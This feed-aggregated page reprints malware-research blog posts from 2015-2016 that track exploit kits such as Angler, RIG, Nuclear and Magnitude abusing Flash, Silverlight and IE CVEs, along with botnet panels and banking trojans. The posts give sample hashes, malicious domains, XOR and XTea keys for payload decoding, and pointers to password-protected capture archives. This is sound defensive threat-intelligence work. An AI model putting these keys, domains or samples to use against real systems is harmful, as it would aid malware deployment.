f985b38f5e8bd1dfb3767cfea89ca776Dridex - b0f34f62f49b9c40e2558c1fa17523b5 (this one was 10 days ago..but worth a mention)Andromeda (several instances)and obviously many Bedep threads and their stream of PE (evotob, reactorbot (several instances), Tofsee, Teslacrypt,Kovter, Miuref)Edit 1: 2016-03-29 -  I was mentioning 2016-1010 as a candidate but it's not. Modified with the correct CVE ID provided by Eset and Kaspersky..

CVE-2016-0034 (Silverlight up to 5.1.41105.0) and Exploit Kits

Tuesday March 29th, 2016 06:39:36 PM
Fixed with the January 2016 Microsoft patches, CVE-2016-0034  ( MS16-006 ) is a Silverlight Memory Corruption vulnerability and it has been spotted by Kaspersky with rules to hunt Vitaliy Toropov’s unknown Silverlight exploit mentioned in HackingTeam leak.Angler EK :On the 2016-02-18 the landing of Angler changed slightly to integrate this piece of code :Silverlight integration Snipet from Angler Landing after decoding2016-02-18resulting in a new call if silverlight is installed on the computer:Angler EK replying without body to silverlight callHere a Pass in great britain dropping Vawtrak via Bedep buildid 77862016-02-18I tried all instances i could find and the same behavior occured on all.2016-02-22 Here we go : call are not empty anymore.Angler EK dropping  Teslacrypt via silverlight  5.1.41105.0 after the "EITest" redirect 2016-02-22I made a pass with Silverlight : 5.1.41212.0 : safe.Edit1 : I received confirmation that it's indeed CVE-2016-0034 from multiple analyst including Anton Ivanov (Kaspersky). Thanks !Xap file : 01ce22f87227f869b7978dc5fe625e16Dll : 22a9f342eb367ea9b00508adb738d858Out of topic payload : 6a01421a9bd82f02051ce6a4ea4e2edc (Teslacrypt)Fiddler sent hereRIG : 2016-03-29Malc0de spotted modification in the Rig landing indicating integration of Silverlight Exploit.Here is a pass where the Silverlight is being fired and successfully exploited. CVE identification by : Anton Ivanov (Kaspersky)RIG - CVE-2016-0034 - 2016-03-29Xap file in that pass :  acb74c05a1b0f97cc1a45661ea72a67a080b77f8eb9849ca440037a077461f6bcontaining this dll : e535cf04335e92587f640432d4ec3838b4605cd7e3864cfba2db94baae060415( Out of topic payload : Qbot 3242561cc9bb3e131e0738078e2e44886df307035f3be0bd3defbbc631e34c80 )Files : Fiddler and sample (password is malware)Reading :The Mysterious Case of CVE-2016-0034: the hunt for a Microsoft Silverlight 0-day - 2016-01-13 - Costin Raiu & Anton Ivanov - KasperskyPost Publication Reading:(PDF) Analysis of Angler's new silverlight Exploit - 2016-03-10 - Bitdefender Labs

Cryptowall son of Borracho (Flimrans) ?

Wednesday February 10th, 2016 10:13:10 PM
Lately I received multiple questions about connection between Reveton and Cryptowall.I decided to have a look.A search in ET Intelligence portal at domains from Yonathan's Cryptowall TrackerET Intelligence search on Specspa .comshow that the first sample ET has talking with it is :e2f4bb542ea47e8928be877bb442df1b  2013-10-20A look at the http connexion shows the "us.bin" call mentioned by Yonathan (btw the us.bin item is still live there)ET Intelligence  : e2f4bb542ea47e8928be877bb442df1b http connexionsET Intelligence : Associated alert pointing at Cryptowall.A look into VirusTotal Intelligence shows that this sample is available in a Pcap captured and shared by ThreatGlass :NSFW://www.threatglass .com/malicious_urls/sunporno-comHiman EK dropping Cryptowall 2013-10-20captured by ThreatGlassWith the same referer and in the same Exploit Kit i got dropped 20 days earlier Flimrans :(See : )Flimrans disappeared soon after this post from 2013-10-08 about the affiliate : Flimrans is showing in US the same Design from Reveton pointed by Yonathan :Flimrans US 2013-10-03What is worth mentioning is that Flimrans was the only ransomware (i am aware of) to show a Spanish version of this same design :Flimrans ES 2013-10-03The timeline is also inline with a link between those two Ransomware (whereas Reveton was still being distributed months after these events).Digging into my notes/fiddlers i even found that this bworldonline .com which is still hosting the us.bin was in fact also the redirector to HiMan dropping Flimrans 20 days earlier from same sunporno upper.[The credits goes to Eoin Miller who at that time pointed that infection path allowing me to replay it]The compromised server storing the first design Blob used by cryptowallused to redirect 20 days earlier to Himan dropping Flimrans (which is using that same design).So...Cryptowall son of Borracho? I don't know for sure...but that could to be a possibility.Files : Items mentionned here. (password is malware)Read More:HiMan Exploit Kit. Say Hi to one more - 2013-10-02Flimrans Affiliate : Borracho - 2013-10-08

CVE-2015-8651 (Flash up to and Exploit Kits

Thursday April 7th, 2016 12:08:26 PM
While other exploit kit are struggling to keep up with Angler (none is firing CVE-2015-8446 , maybe because of the Diffie-Hellman protection on Angler's exploits ),- Nuclear / Magnitude and Neutrino last exploits are from October (CVE-2015-7645)- RIG and Sundown are relying on July exploits (Hacking Team's one - CVE-2015-5122)( all have the IE CVE-2015-2419 from august)Angler has just integrated CVE-2015-8651 patched with Flash on 2015-12-28Angler EK : 2016-01-25The exploit might be here since the 22 based on some headers modification which appeared that day.It's not yet pushed in all Angler EK threads but widely spread.Thanks Anton Ivanov (Kaspersky) for CVE Identification !CVE-2015-8651 (and CVE-2015-2419) being successfully exploited by Angler EK to load bedep in memory2016-01-25Fiddler sent to VT.---Another pass via the "noisy" Cryptowall "crypt13x" actor which threads also has it :CVE-2015-8651 being successfully exploited by Angler EK to load Cryptowall  (crypt13001)from the widely spread and covered "crypt13x" actor thread - 2016-01-25(Out of Topic payload : 5866906a303b387b9918a8d7f8b08a51 Cryptowall crypt13001 )I have been told by Eset that the exploit is successful on Flash and Firefox.---I spotted a thread serving a landing and an exploit to Firefox.2016-03-23 Firefox pass with Sandbox escape :Angler EK exploiting CVE-2015-8651 on Firefox 33.1.1 and Flash successfully wrote its payload on the drive.2016-03-23Files : Fiddler in a zip (password malware)Neutrino :Thanks Eset for identifying the added CVE here.Neutrino Exploiting CVE-2015-8651 on 2016-02-09Here Bunitu droppedNote: For some reason couldn't have it working with Flash : Fiddler here (password is malware)Nuclear Pack:Thanks again Eset for CVE identification here.Nuclear Pack exploit CVE-2015-8651 on 2016-02-10Out of topic payload: cdb0447019fecad3a949dd248d7ae30f which is a loader for CloudScout (topflix .info - which we can find in RIG as well those days)It seems Chrome won't save you if you do let it update.2016-02-17 on DE/US/FR trafficThis is not something i can reproduce.Is what i get with Chrome 46.0.2490.71 and its builtin (which should fast update itself to last version)Files : Fiddler here (password: malware)Magnitude:2016-02-18CVE ID confirmed by Anton Ivanov (Kaspersky)Magnitude dropping Cryptowall via CVE-2015-86512016-02-18Files : Fiddler here (Password is malware)RIG :Some days before 2016-04-06Thanks FireEye for CVE identification.CVE-2015-8651 successfuly exploited by RIG on 2016-04-07Sample in that pass: 4888cc96a390e2970015c9c1d0206011a6fd8e452063863e5e054b3776deae02( Out of topic payload: 30cb7ed7a67eb08fa2845990b7270d64d51e769d6e0dad4f9c2b8e7551bced0a Probably Godzilla downloader)Files : RIG_2016-04-07 (swf, payload and Fiddler - password is malware)Read More:(GoogleTranslate - via @eromang ) Offshore "Dark Hotel" organization of domestic business executives launched APT attacks - 2015-12-31 - ThreatBookPost publication reading :An Analysis on the Principle of CVE-2015-8651 - Antiy Labs - 2016-01-26

XXX is Angler EK

Tuesday August 30th, 2016 02:06:14 PM
Snipshot of MonterAV AffiliateAs I got many questions about an EK named XXX (that is said to be better than Angler 😉 ) I decided to share some data here.XXX Control Panel Login Page.XXX is Angler EK ( it's the real name of its most documented instance at least)Angler EK / XXX  IE sploit only Stats on 2015-07-25(for some reason Flash Exploits were not activated on that thread)Note the Chase Logo >> JPMorgan  >>  Cool EK's Exploit Buyer ;)You might want to read "The Transition - "Reveton Team" or "Mr.J/Monster AV" from :Paunch's arrest...The end of an Era ! (2013-10-11) . This is where I first wrote the defense chosen name for this Exploit Kit. The name is chosen after a logo from the Reveton Affiliate.Snipshot of "The Transition" after Paunch's ArrestBut Angler was around before the Reveton team started to use it.Here is one used against Ukrainian that i captured  in August 20132013-08-27 - Exploit Kit unknown to me at that timeAncestor of Angler EK as we know it[Payload here is most probably Lurk]when Reveton Team was still on Cool EK. It appears that instance had already Fileless capabilities.A Russian researcher friend connect that instance back to this Securelist post from 2012-03-16 : A unique ‘bodiless’ bot attacks news site visitorsSo the (c) 2010 at the bottom of the control panel is probably...the real birth year of Angler.This indexm.html variant of Angler EK is most probably still being used in RU/UA and was one of the early adopter of CVE-2015-0311 (a flash 0day from January) before many "standard" instances of Angler. There was still java exploit inside in march2015-01-27 - Angler EK "indexm" exploiting CVE-2015-2551 and firing Java exploits[Payload here is most probably Lurk]Angler EK has been briefly mentioned (translation here ) as part of a "partnerka" by a user using Menatep as Nickname in February 2014Conclusion : xxx is what we call Angler EK and Angler EK (indexm instance) is not that young!Files : 2 Fiddler pass of Angler EK "indexm" from 2013 and 2015 (Password : malware)Read More :Police Locker land on Android Devices - 2014-05-04Paunch's arrest...The end of an Era ! - 2013-10-11Crimeware Author Funds Exploit Buying Spree - 2013-01-07 - KrebsOnSecurityCool Exploit Kit - A new Browser Exploit Pack on the Battlefield with a "Duqu" like font drop - 2012-10-09A unique ‘bodiless’ bot attacks news site visitors - 2012-03-16 - Sergey Golovanov - SecurelistPost publication Reading :Russian hacker gang arrested over $25m theft - 2016-06-02 - BBC News [Cf Lurk]Is it the End of Angler ? - 2016-06-11How we helped to catch one of the most dangerous gangs of financial cybercriminals - 2016-08-30 - SecureList

CVE-2015-8446 (Flash up to And Exploit Kits

Wednesday January 27th, 2016 03:27:21 AM
One week after patch Flash is being exploited by Angler EK via CVE-2015-8446Angler EK :2015-12-14CVE identification by Anton Ivanov ( Kaspersky ) and FireEye  (Thanks !)Angler EK exploiting Flash via CVE-2015-84462015-12-14Sample in that pass : b5920eef8a3e193e0fc492c603a30aafSample from other Angler EK instance : 0615fb9e037b7bf717cc9b04708e51da 720089b93a0f2bb2a72f1166430de522Fiddler sent to VT.(Not replayable. You know how to contact me to land on live instances. I might not reply to mail coming from gmail,live,yahoo etc...  mailboxes)Out of topic : in that pass Bedep BuildID 5004 is loaded in Memory and is then grabbing those 2 dll in a streamf5c1a676166fe3472e6c993faee42b34d65f155381d26f8ddfa304c83b1ad95a (Credential Stealer)and after that performing AdfraudCVE-2015-8446 in Angler EK - malicious mp3 is stored in encrypted JSON (same schema as in CVE-2015-5560).— Anton Ivanov (@antonivanovm) December 17, 2015 Last safe version of Flash against commercial exploit kit  was fixing CVE-2015-7645Post publication readings :(Google Translate) Angler EK latest CVE-2015-8446 Flash Exploit analysis - 2015-12-19 - Qihoo360

Nuclear Pack loads a fileless CVE-2014-4113 Exploit

Monday June 27th, 2016 08:23:00 AM
Yesterday's Nymaim spam campaign was also redirecting to Nuclear Pack.Without big surprise the sample ( 592899e0eb3c06fb9fda59d03e4b5b53 ) dropped by Nuclear is the same as the fake update proposed.But there was an additionnal 11kb payload call for which i could not find sample on driveNuclear Pack dropping Nymaim in the 2015-11-30 Spam CampaignIt was also unusually encoded with two XOR pass and first part of the decoded stream is a Shellcode.Friends (who don't want to be mentioned) figured a privilege escalation was in use there :According to Kaspersky and Timo Hirvonen (F-Secure) it's CVE-2014-4113 ( Win32k.sys Elevation of Privilege Vulnerability )I did not got to see the privilege escalation in live condition.Note: it's not the first time a public Exploit Kit is integrating an exploit to escalates right on dropped payload (Cf CVE-2015-2426 in Magnitude )Files : Fiddler and Dll here (password is malware - XOR key : 56774347426F664767  then  213404052d09212031)Thanks : Kaspersky,  Timo Hirvonen , Malc0de and 2 other friends for taking some time and use their wizardness  on this.Read More :An Analysis of A Windows Kernel-Mode Vulnerability (CVE-2014-4113) - 2014-10-29 - TrendMicro

Inside Jahoo (Otlard.A ?) - A spam Botnet

Tuesday December 29th, 2015 05:48:11 PM
Trash and Mailbox by Bethesda SoftworksOtlard.A (or let's say at least the malware triggering 2806902 || ETPRO TROJAN Win32.Otlard.A C&C Checkin response )  is a Spam BotnetI saw it loaded as a plugin in an instance of AndromedaThat Andromeda is being spread via :Bedep build id 6005 and here 6007 from an Angler EK fed by Malvertising :VirtualDonna group redirecting traffic to an Angler instance loading Bedep buildid 6007 in memoryBedep 6007 loading Andromeda 55ead0e4010c7c1a601511286f879e33 before update task.2015-09-28Note : Bedep 6007 was sometimes loading it with other payload-2015-09-16 for : ec5d314fc392765d065ff16f21722008 with Trapwot (FakeAV) e600985d6797dec2f7388e86ae3e82ba and Pony a4f08c845cc8e2beae0d157a3624b686-2015-09-29 for : 37898c10a350651add962831daa4fffa with Kovter ( 24143f110e7492c3d040b2ec0cdfa3d0 )That Andromeda beaconing to dnswow .com enslaved >10k bots in a week :Andromeda dnswow 2015-11-22Andromeda dnswow 2015-11-27Here the Otlard.A task in that Andromeda instance :Task installing Otlard.A as a plugin to Andromedaa Task in a Smokebot dropped by Nuclear Pack fed by Malvertising :Malvertising > Nuclear Pack > Smokebot > Stealer, Ramnit, Htbot and Andromeda > Otlard.A2015-11-28Smokebot : cde587187622d5f23e50b1f5b6c86969Andromeda : b75f4834770fe64da63e42b8c90c6fcd(out of topic Ramnit : 28ceafaef592986e4914bfa3f4c7f5c0 - It's being massively spread those days in many infection path. (Edit 2015-12-29 :  Htbot.B :  d0a14abe51a61c727420765f72de843a named ProxyBack by PaloAlto)Now here is what the control panel of that plugin looks like :Otlard.A panel :Otlard.A - JahooManager - Main - 2015-09-27Otlard.A - JahooManager - Servers - 2015-09-27Otlard.A - JahooManager - Settings - 2015-09-27Otlard.A - JahooManager - Campaigns - 2015-09-27Otlard.A - JahooManager - Bot - 2015-09-27that exe is : 2387fb927e6d9d6c027b4ba23d8c3073 and appears to be AndromedaOtlard.A - JahooSender - Tasks - 2015-09-27Otlard.A - JahooSender - Tasks - 2015-11-28Otlard.A - JahooSender - Tasks - Done Task - 2015-09-27Otlard.A - JahooSender - Domains - 2015-09-27Otlard.A - JahooSender - Domains - 2015-11-28Otlard.A - JahooSender - Messages - 2015-09-27Otlard.A - JahooSender - Messages - 2015-11-28Otlard.A - JahooSender - Messages - Edit a Message - 2015-11-28Otlard.A - JahooSender - Messages - Edit a Message - 2015-11-28Otlard.A - JahooSender - Messages - Edit a Message - 2015-11-28Otlard.A - JahooSender - Headers - 2015-11-28Otlard.A - JahooSender - Headers - Editing Header - 2015-11-28Otlard.A - JahooSender - Headers - Editing Header - 2015-11-28Otlard.A - JahooSender - Macross - 2015-11-28Otlard.A - JahooSender - Macross - 2015-11-28Otlard.A - JahooSender - Macross - Editing macross - 2015-11-28Otlard.A - JahooSender  - Macross - Editing macross - 2015-11-28Otlard.A - JahooSender - Macross - Editing macross - 2015-11-28Otlard.A - JahooSender - Attach - 2015-11-28Otlard.A - JahooSender - Attach - Attached image - 2015-11-28Otlard.A - JahooSender - Rules - 2015-11-28Otlard.A - JahooSender - Rules > Spam - 2015-11-28Olard.A - JahooSender - Rules > User - 2015-11-28Olard.A - Bases - Emails - 2015-11-28Olard.A - Bases - Blacklist - 2015-11-28Olard.A - Bases - Blacklist - Edit - 2015-11-28Olard.A - Botnet - Main - 2015-09-27Olard.A - Botnet - Main - 2015-11-28Otlard.A - Botnet - Modules - 2015-11-28Otlard.A - Botnet - Modules - Edit - 2015-11-28Otlard.A - Incubator - Accounts - 2015-11-28Otlard.A - Incubator - Settings - 2015-11-28Note : registrator menu has disappeared in last version. --Andromeda C&C 2015-11-28 : | | LLHOST | EU | | LLHost IncSpam Module C&C 2015-11-28 : | | LLHOST | EU | | LLHost IncThanks : Brett StoneGross for helping me with decoding/understanding the network communicationsFiles :All samples which hashes have been discussed here are in that zip.Jahoo - socker.dll : 7d14c9edfd71d2b76dd18e3681fec798( If you want to look into this, i can provide associated network traffic)Read More :Inside Andromeda Bot v2.06 Webpanel / AKA Gamarue - Botnet Control Panel 2012-07-02Inside Pony 1.7 / Fareit C&C - Botnet Control Panel - 2012-06-27Inside Smoke Bot - Botnet Control Panel - 2012-04-28Post publication Reading :ProxyBack Malware Turns User Systems Into Proxies Without Consent - 2015-12-23 - JeffWhite - PaloAlto

CVE-2015-7645 (Flash up to and Exploit Kits

Saturday March 12th, 2016 12:09:34 PM
The CVE-2015-7645 has been fixed with Adobe Flash Player Spotted in the wild (2015-10-13) in APT28's exploit kit by TrendMicro, this exploit was already reported 2 weeks before (2015-09-29) to Adobe by Natalie Silvanovich.I reported the Flash 0-day (CVE-2015-7645) two weeks before it was found in the wild— Natalie Silvanovich (@natashenka) 16 Octobre 2015 It has now made its way to Exploit KitAngler EK :2015-10-29CVE id confirmed by by Anton Ivanov ( Kaspersky )Angler EK successfully exploiting Flash sample in that pass : 4af57fb1c71bb9c1599371d48240ff36Another sample : bea824974f958ac4efc58484a88a9c18One more from the Poweliks instance : 0d72221d41eff55dcfd0da50cd1c545eNot replayable fiddler sent to VTOut of topic sample loaded by bedep :5a60925ea3cc52c264b837e6f2ee915e Necursa9d5a9a997954f5421c94ac89d2656cd Vawtrak ( < that one was not expected in that infection path)2016-03-12Edge is now being served a landing and the flash being sent is targeting this CVE according to Kaspersky and EsetAngler EK exploiting Flash on Windows 10 (build 10240) through EdgeFiddler : AnglerEK_Edge_18.0.0.209_2016-03-11.zipNuclear Pack:2015-10-30Nuclear Pack which has been playing with landing URI pattern lately has integrated itCVE-2015-7645 in Nuclear Pack on 2015-10-30Sample in that pass : f5dd2623ae871d58483bf14ec5d635e4Out of topic payload : 0b3de2a8d838883e10a1d824d20fe95c Kelihos Loader (harsh02)Fiddler sent to VTMagnitude:2015-11-10Magnitude trying to exploit CVE-2015-76452015-11-10Spotted sample : 21993dd3b943d935a9296aeff831cbb9 CVE id confirmed by Timo HirvonenNo payload but the actor behind that thread would like to see you Cryptowalled. Update might come.Spartan :2015-11-12Without surprise as Spartan is the work of the coder of Nuclear Pack.Note : old version of Chrome <= 43.0.257 and Firefox < 38 seems to be falling as wellSpartan pushing Pony and Alphacrypt via CVE-2015-76452015-11-12Sample in that pass : 1c074c862d3e25ec9674e6bd62965ad8  (another one: 66f34cd7ef06a78df552d18c729ae53c )(out of topic payload : Pony: 29c940f9d0805771e9c7ec8a5939fa25 ( /myadvert/autoget.php) and Cryptowall 74ebff4acc4ad9c2a2e665ff293c02e6  NB earlier today drops were Pony and Alphacrypt ) Fiddler sent to VTNeutrino:Most probably appeared 2015-10-16Necurs being dropped by Neutrino via CVE-2015-76452015-11-17Sample in that pass: 7dd9813ef635e98dd9585deaefecfcff(Out of topic payload : Necurs a83a96e87e80adef1e4598a645f2918c )Fiddler sent to VT  (You might want to read the detailed analysis by Trustave)Read More :Adobe Flash: Type Confusion in IExternalizable.writeExternal When Performing Local Serialization - 2015-09-29 - Natalie SilvanovichNew Adobe Flash Zero-Day Used in Pawn Storm Campaign Targeting Foreign Affairs Ministries - 2015-10-13 - Feike Hacquebord - Brooks Li - Peter Pi - TrendMicroLatest Flash Exploit Used in Pawn Storm Circumvents Mitigation Techniques - 2015-10-16 - Peter Pi - TrendMicroPost Publication Reading :Neutrino Exploit Kit – One Flash File to Rule Them All - 2015-12-28 - Daniel Chechik and Anat Davidi - Spiderlabs/Trustwave

A DoubleClick https open redirect used in some malvertising chain

Saturday January 16th, 2016 04:05:15 PM
In the post on the UK focused Shifu I illustrated malvertising traffic to Angler.The traffer group behind this activity is the same exposed by BelchSpeak from Invincea in many tweets (explaining the addition of code to spot Invincea Sandbox)  FoxIT in june,  Malwarebytes in September,  or Trendmicro 2 weeks ago.As it's easier to have a name to share/talk  about stuff i'll use "VirtualDonna Traffers" to refer to them (virtualdonna .com is one of the domains they used that got some attention)Earlier this year they were using https,2015-07-11 - as https url shortenertiny url2015-07-11 - tiny url as https url shorteneror url shortener2015-06-12 - as https url shorterner and switched to their own https redirector behind cloudflare around the middle of September ( naotsandhap.euTwo pass here : same source (Dailymotion), same country (Australia), same Traffer for same customer (how/why? same payload : Reactorbot  srvdexpress3 .com)Different Legit part of the chain2015-09-29then 2 weeks ago and )https gives the traffer the ability to kill the referer chain (making it more difficult to figure out where the Exploit Kit landing spotted in the traffic is coming from).Once discovered a way to Sig this is to flag the ssl certificate being used.Those days they are using a DoubleClick https open redirect.VirtualDonna Traffers exploiting an https open redirect by Doubleclick in its chain to Angler EKGB - 2015-10-15Out of topic Payload in that pass : Shifu - 695d6fbd8ab789979a97fb886101c576 beaconing to nyctradersacademy .comDoubleclick has been informed about the issue.Post Publication Readings :The shadow knows: Malvertising campaigns use domain shadowing to pull in Angler EK - 2015-12-15 - ProofpointLet’s Encrypt Now Being Abused By Malvertisers - 2016-01-06 - TrendMicro

Shifu <3 Great Britain

Monday February 29th, 2016 08:29:24 AM
I noticed since several days a shift in malware distribution in the UK.Many infection path that I follow are now dropping a banker that i already saw many times, especially at the end of 2014 and mostly in Italy.First time I encountered that threat : 2014-10-08Angler EK dropping 165146e43ccee9c29b62693caf290df7 in an IT focused infection path2014-10-08At that time I learnt from Frank Ruiz ( FoxIT ) that he spotted it 1 month earlier (2014-09-03 exactly). We were using a "non public" name to talk about it.So two days ago in UK traffic :2015-09-22 - An Angler EK dropping  0598ee3e06c681d7f9e05d83bb7ea422 via malvertising on GBR trafficI saw that banking trojan again. (note : contacted,  Frank Ruiz told me that this banker activity never really stopped). What was new to me is that it was installing Apache,Apache folder installed by 0598ee3e06c681d7f9e05d83bb7ea422 2015-09-22Apache ConfigData folder of the Apache installationCustomers of 4 financial institutions are targeted by the injects stored in the config.xmlconfig.xmlThe same day i saw it again, other malvertising campaign (read: other actor bringing the traffic) and not dropped directly but as a 2nd Stage in a bedep thread which was not grabbing an adfraud module:Angler EK pushing bedep grabbing 791491ba9f0a7670659f45f1e5421c83 2015-09-22Seeing it again today in malvertising campaign focused on UK, I decided to write about that and contacted Brett StoneGross (Dell SecureWorks) to try and get the 'defense name' for this. He told me that what I was describing was probably Shifu ..and fast confirmed it looking at the sample. (Edit reaction to twitter : He also told me that Shifu is based on Shiz)So here we are: Shifu <3 GBRShifu <3 GBR2015-09-24Side note : Here are some of the DGA in case main domain stop working.Files : Password : malwareContains : 4 fiddler, 1 pcap, 6 samples and 2 apache config folder (with injects).Thanks: Frank Ruiz (Foxit) and Brett StoneGross (Dell SecureWorks) for their inputs/insight/awesomeness.Read More:Shifu: ‘Masterful’ New Banking Trojan Is Attacking 14 Japanese Banks - 2015-08-31 - Limor Kessem - IBM X-ForceJapanese Banking Trojan Shifu Combines Malware Tools - 2015-09-24 - Diwakar Dinkar - McAfeePost publication Reading:3,000 High-Profile Japanese Sites Hit By Massive Malvertising Campaign  2015-09-30 - Trenmicro

CVE-2015-5560 (Flash up to and Exploit Kits

Tuesday January 12th, 2016 06:06:14 PM
Patched with flash version, CVE-2015-5560 is now being exploited by Angler EK.Angler EK :2015-08-29[Edit : 2015-09-01] Exploit candidated by by Anton Ivanov ( Kaspersky ) as CVE-2015-5560 [/edit]The exploit has been added the 28th. It's not being sent to Flash uses the same Diffie-Hellman Key Exchange technique described by FireEye as in their CVE-2015-2419 implementation making a default fiddler unreplayable.Angler EK pushing Bedep to Win7 IE11 Flash - CVE-2015-55602015-08-29Sample in that pass : 9fbb043f63bb965a48582aa522cb1fd0Fiddler sent to VT (password is malware)Note: with help from G Data, a replayable fiddler is available. No public share (you know how to get it).Nuclear Pack :2015-09-10Additional post spotted on the 2015-09-10Nuclear Pack additionnal post on 2015-09-10 showing integration of CVE-2015-5560 was on the roadand got a first payload  the day after :Nuclear Pack successfully exploiting Flash with CVE-2015-5560 (rip from Angler)2015-09-11( Out of topic payload : 91b76aaf6f7b93c667f685a86a7d68de  Smokebot C&C  hostnamessimply1.effers .com: )Files : Fiddler here (Password is malware)Read More :Adobe Flash: Overflow in ID3 Tag Parsing - 2015-06-12 Google Security ResearchThree bypasses and a fix for one of Flash's Vector.<*> mitigations - 2015-08-19 - Chris Evans - Google Project ZeroCVE-2015-2419 – Internet Explorer Double-Free in Angler EK  - 2015-08-10 - FireEyeBedep’s DGA: Trading Foreign Exchange for Malware Domains - 2015-04-21 - Dennis Schartz - Arbor SertPost publication reading :Attacking Diffie-Hellman protocol implementation in the Angler Exploit Kit - 2015-09-08 KasperskyAnalysis of Adobe Flash Player ID3 Tag Parsing Integer Overflow Vulnerability (CVE-2015-5560) - 2016-01-12 - Nahuel Riva - CoreSecurity

CVE-2015-2419 (Internet Explorer) and Exploits Kits

Wednesday July 6th, 2016 10:00:12 AM
As published by FireEye Angler EK is now exploiting CVE-2015-2419 fixed with MS15-065Angler EK :2015-08-10It seems they might have started to work on that exploit as early as 2015-07-24 where some instances briefly used code to gather ScriptEngineVersion from redirected visitors :Angler EK gathering ScriptEngineVersion data the fast way.2015-07-24Today first pass i made was showing a new POST call and was successfully exploiting a VM that used to be safe to Angler.CVE-2015-2419 successfully exploiting IE11 in windows 72015-08-10(Here bedep grabbing Pony and TeslaCrypt then doing some AdFraud)I spent (too much 😉 ) time trying to decode that b value in the POST reply.Here are some materials :- The landing after first pass of decoding and with some comments : post call is handled by String['prototype']['jjd'] , ggg is sent to Post data as well as the ScriptEngineVersion (in the shared pass : 17728 )- The l() function handling the post : The post data and reply after first pass of decoding : : 2 Fiddlers (ScriptEngineVersion Gathering and successfull pass - use malware as password)Thanks :Horgh_RCE for his helpMagnitude :2015-08-22( I am waiting for some strong confirmation on CVE-2015-2426 used as PrivEsc only here )Magnitude successfully exploiting CVE-2015-2419 to push an elevated (CVE-2015-2426) Cryptowall on IE11 in Win72015-08-22As you can see the CVE-2015-2419 is a RIP of Angler EK's implementation (even containing their XTea key, despite payload is in clear)Note : The CVE-2015-2426 seems to be used for privilege escalation onlyCryptowall dropped by Magnitude executed as NT Authority\system after CVE-2015-24262015-08-23and has been associated to flash Exploit as well.Pass showing the privilege escalation has been associated to flash Exploit as well.2015-08-23Files : CVE-2015-2419 pass (password: malware)CVE-2015-5122 pass featuring CVE-2015-2426 (password : malware)Thanks :Horgh_RCE , EKWatcher and Will Metcalf for their helpNuclear Pack:2015-08-23Nuclear Pack exploiting IE11 in Win7 with CVE-2015-2419 to push TeslaCrypt2015-08-23Files :  Fiddler (Password is malware)Neutrino :CVE Identification by Timo HirvonenNeutrino successfully exploiting CVE-2015-2419 on IE11 in Windows 72015-08-27(Out of topic payload : c7692ccd9e9984e23003bef3097f7746  Betabot)Files: Fiddler (Password is malware)RIG:2015-08-27RIG successfully exploiting CVE-2015-24192015-08-27(Out of topic payload : fe942226ea57054f1af01f2e78a2d306 Kelihos (kilo601)Files : Fiddler (password is malware)Hunter :2015-08-27@hunter_exploit 2015-08-26As spotted by Proofpoint Hunter EK has integrated CVE-2015-2419Hunter Exploit Kit successfully exploiting CVE-2015-24192015-08-27Files : Fiddler (password is malware)Kaixin :2016-01-08Files: Fiddler here (password is malware)( out of topic Payload : bb1fff88c3b86baa29176642dc5f278d firing PCRat/Gh0st ET rule 2016922 )Sundown :2016-07-06 - Thanks  Anton Ivanov (Kaspersky) for confirmationSundown successfully Exploiting CVE-2015-2419 - 2016-07-06cmd into wscript into Neutrino-ish named / RC4ed Payload let think this is a Rip from Neutrino implementation( Out of topic payload: bcb80b5925ead246729ca423b7dfb635 is a Netwire Rat )Files : Sundown_CVE-2015-2419_2016-07-06 (password is malware)Read More :Hunter Exploit Kit Targets Brazilian Banking Customers - 2015-08-27 - ProofpointCVE-2015-2419 – Internet Explorer Double-Free in Angler EK - 2015-08-10 - Sudeep Singh, Dan Caselden - FireEye2015-08-10 - ANGLER EK FROM SENDS BEDEP This pass shared by Brad from Malware-Traffic-Analysis is including the CVE-2015-2419Generic bypass of next-gen intrusion / threat / breach detection systems - 2015-06-05 - Zoltan Balazs - EffitasPost publication Reading :Attacking Diffie-Hellman protocol implementation in the Angler Exploit Kit - 2015-09-08 Kaspersky

CVE-2015-1671 (silverlight up to 5.1.30514.0) and Exploit Kits

Tuesday September 1st, 2015 07:32:11 AM
Patched with ms15-044 CVE-2015-1671 is described as TrueType Font Parsing Vulnerability.Silverlight up to 5.1.30514.0 are affected, but note : most browser will warn that the plugin is outdatedOut of date Plugin protection in Chrome 39.0.2171.71Out of date ActiveX controls blocking in Internet Explorer 11(introduced in August 2014)and also consider that Microsoft announced the end of Silverlight at beginning of the month.Angler EK :2015-07-21Around the 1st of July some new Silverlight focused code appeared in Angler EK landing.It even seems coders made some debug or something wrong as you could see this kind of popup several hours long on Angler EK.Deofuscated snipet of Silverlight call exposed to Victims in Angler EK2015-07-02I failed trying to get something else than a 0 size silverlight calls.I heard about filled calls from Eset and EKWatcher.The exploit sent was 3fff76bfe2084c454be64be7adff2b87  and appears to be a variation of CVE-2015-1671 (Silverlight 5 before 5.1.40416.00).  I spent hours trying to get a full exploit chain....No luck. Only 0size calls.But, it seems it's back today (or i get more lucky ? ) :--Disclaimer : many indicators are whispering it's the same variation of CVE-2015-1671, but I am still waiting for a strong confirmation--Silverlight 5.1.30514.0 exploited by Angler EK via CVE-2015-1671 in IE 11 on Windows 72015-07-21Silverlight 5.1_10411.0 exploited by Angler EK via CVE-2015-1671 in Chrome 39 on Windows 72015-07-21Silverlight 5.1.30514.0 exploited by Angler EK via CVE-2015-1671 in Firefox 38 on Windows 72015-07-21Two x86 - x64 dll are encoded in the payload stream with XTea Key : m0boo69biBjSmd3pSilverlight dll in DotPeek after Do4dotSample in those pass : ac05e093930662a2a2f4605f7afc52f2(Out of topic payload is bedep which then gather an adfraud module - you have the XTea key if you want to extract)Files: Fiddler (password is malware)[Edit : 2015-07-26, has been spread to all Angler Threads]Thanks for help/tips :Eset, Microsoft, Horgh_RCE,  Darien Huss, Will Metcalf, EKWatcher.Magnitude :2015-07-28  has been spotted by Will Metcalf in MagnitudeIt's a rip of Angler's oneSilverlight 5.1.30514.0 exploited by Magnitude2015-08-29Files: Fiddler (password is malware)Read more :CVE-2013-0074/3896 (Silverlight) integrates Exploit Kits - 2013-11-13

Sorry, the feed is not available at this time.
Failed to get content from ''
Failed to get content from ''
Failed to get content from ''
Sorry, the feed is not available at this time.
Sorry, the feed is not available at this time.

Feed aggregation powered by Syndicate Press.
Processed request in 5.09551 seconds.

convert this post to pdf.
Be Sociable, Share!